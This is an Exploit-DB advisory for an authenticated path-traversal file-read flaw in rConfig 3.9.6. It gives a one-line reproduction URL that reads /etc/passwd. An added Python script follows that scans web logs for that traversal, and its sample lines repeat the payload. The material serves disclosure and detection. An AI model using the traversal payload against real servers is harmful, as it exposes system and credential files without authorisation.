rConfig 3.9.6 – ‘path’ Local File Inclusion (Authenticated)

  • Author: Murat ŞEKER
    Date: 2021-03-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49644/
  • # Exploit Title: rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)
    # Date: 2021-03-12
    # Exploit Author: 5a65726f
    # Vendor Homepage: https://www.rconfig.com
    # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
    # Version: rConfig v3.9.6
    # Install scripts:
    # https://www.rconfig.com/downloads/scripts/install_rConfig.sh
    # https://www.rconfig.com/downloads/scripts/centos7_install.sh
    # https://www.rconfig.com/downloads/scripts/centos6_install.sh
    # Tested on: CentOS 7
    # Notes: To reproduce this in a lab environment, follow these links:
    # http://help.rconfig.com/gettingstarted/installation
    # then
    # http://help.rconfig.com/gettingstarted/postinstall
    
    # Description:
    rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php via the path parameter. ajaxGetFileByPath.php allows authenticated users to download any file on the server.
    
    The following steps reproduce this vulnerability.
    
    - Log in to the rConfig application with your credentials.
    - Enter the following link in your browser:
    http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd
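
An added detection example (not part of the original advisory or of rConfig's code): it scans web-server access logs for requests to the endpoint named above whose `path` parameter contains traversal segments or an absolute path outside an allowed directory. The combined log format, the `ALLOWED_BASE` placeholder and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/lib/ajaxHandlers/ajaxGetFileByPath.php"  # endpoint named in the advisory
ALLOWED_BASE = "/path/to/rconfig/data"  # placeholder (assumption): set to your data directory
# Assumption: Apache/nginx "combined" access-log format.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')

# Constructed sample log lines (documentation-range IP addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Mar/2021:10:00:01 +0000] "GET ' + ENDPOINT
    + '?path=../../../../../../etc/passwd HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [15/Mar/2021:10:00:05 +0000] "GET ' + ENDPOINT
    + '?path=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [15/Mar/2021:10:01:00 +0000] "GET ' + ENDPOINT
    + '?path=/path/to/rconfig/data/router1/config.txt HTTP/1.1" 200 880 "-" "Mozilla/5.0"',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so multiply-encoded values are normalised."""
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(target):
    """Return a reason string if the request target looks like abuse, else None."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("path", []):
        value = fully_decode(raw).replace("\\", "/")
        if ".." in value.split("/"):
            return "traversal segment in path"
        inside = (posixpath.normpath(value) + "/").startswith(ALLOWED_BASE + "/")
        if value.startswith("/") and not inside:
            return "absolute path outside allowed base"
    return None

def scan(lines):
    """Return (client_ip, status, reason, target) for each flagged log line."""
    hits = []
    for m in filter(None, map(REQUEST_RE.match, lines)):
        reason = classify(m["target"])
        if reason:
            hits.append((m["ip"], m["status"], reason, m["target"]))
    return hits
```

`scan()` accepts any iterable of log lines, so an open access-log file object can be passed directly; a 200 status on a flagged line indicates the server returned content for that request.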